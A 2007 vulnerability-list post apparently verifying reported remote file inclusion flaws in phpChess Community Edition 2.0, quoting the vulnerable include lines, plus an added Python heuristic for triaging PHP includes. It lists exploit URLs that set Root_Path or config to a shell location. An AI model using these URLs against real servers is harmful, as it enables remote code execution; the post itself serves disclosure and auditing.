[VIM] Mostly True: phpChess Community Edition 2.0 RFI
Heinbockel, Bill
heinbockel at mitre.org
Mon May 7 15:59:47 UTC 2007
MILW0RM:3837
BID:23797
# Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
TRUE: <?php include($Root_Path."skins/".$SkinName."/admin_header.php");?>
# Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
TRUE: <?php include($Root_Path."skins/".$SkinName."/header.php");?>
# Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell
TRUE: <?php include($Root_Path."includes/cells/".$Contentpage);?>
# Exploit:[Path]/includes/language.php?config=Shell
FALSE: (included from a function definition called from outside of the file)
function GetStringFromStringTable($strTag, $config){
include($config);
...
William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615
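
The distinction drawn above, between the three includes that sit at file scope and the one inside `GetStringFromStringTable`, can be checked mechanically when auditing PHP source. The following is an added example, not part of the original message or of phpChess: a heuristic Python triage pass that assumes request parameters can populate uninitialised globals (register_globals-style behaviour). `triage`, `SAMPLES` and the verdict labels are hypothetical names, and the sample sources are constructed from the excerpts quoted above.

```python
import re

# One pass over the source: function headers, braces, include/require
# statements and plain assignments. Heuristic only: it ignores braces inside
# strings or comments and does not follow `global` declarations.
TOKEN = re.compile(
    r'function\s+\w+\s*\((?P<params>[^)]*)\)'
    r'|(?P<open>\{)|(?P<close>\})'
    r'|\b(?:include|require)(?:_once)?\b\s*\(?\s*(?P<inc>[^;]*);'
    r'|\$(?P<assign>\w+)\s*=(?![=>])'
)
VAR = re.compile(r'\$(\w+)')

# Constructed from the excerpts in the post (function body closed for parsing).
SAMPLES = {
    'skins/phpchess/layout_admin_cfg.php': '<?php\ninclude($Root_Path."skins/".$SkinName."/admin_header.php");?>',
    'skins/phpchess/layout_cfg.php': '<?php include($Root_Path."skins/".$SkinName."/header.php");?>',
    'skins/phpchess/layout_t_top.php': '<?php include($Root_Path."includes/cells/".$Contentpage);?>',
    'includes/language.php': 'function GetStringFromStringTable($strTag, $config){\ninclude($config);\n}',
}

def triage(src):
    """Return [(variable, verdict)] for each include whose path starts with a variable."""
    findings, assigned = [], set()
    depth, pending, func = 0, None, None      # func = (body depth, parameter names)
    for m in TOKEN.finditer(src):
        if m.group('params') is not None:
            pending = set(VAR.findall(m.group('params')))
        elif m.group('open'):
            depth += 1
            if pending is not None:
                func, pending = (depth, pending), None
        elif m.group('close'):
            if func and func[0] == depth:
                func = None
            depth -= 1
        elif m.group('assign') and func is None:
            assigned.add(m.group('assign'))   # initialised at file scope
        elif m.group('inc') is not None:
            lead = re.match(r'\$(\w+)', m.group('inc'))
            if not lead:
                continue                      # path starts with a literal: prefix is fixed
            name = lead.group(1)
            if func:
                verdict = 'function-parameter' if name in func[1] else 'function-local'
            else:
                verdict = 'initialised' if name in assigned else 'uninitialised-at-file-scope'
            findings.append((name, verdict))
    return findings
```

Only `uninitialised-at-file-scope` corresponds to the entries marked TRUE above; a `function-parameter` result still needs each call site reviewed to see what is passed in.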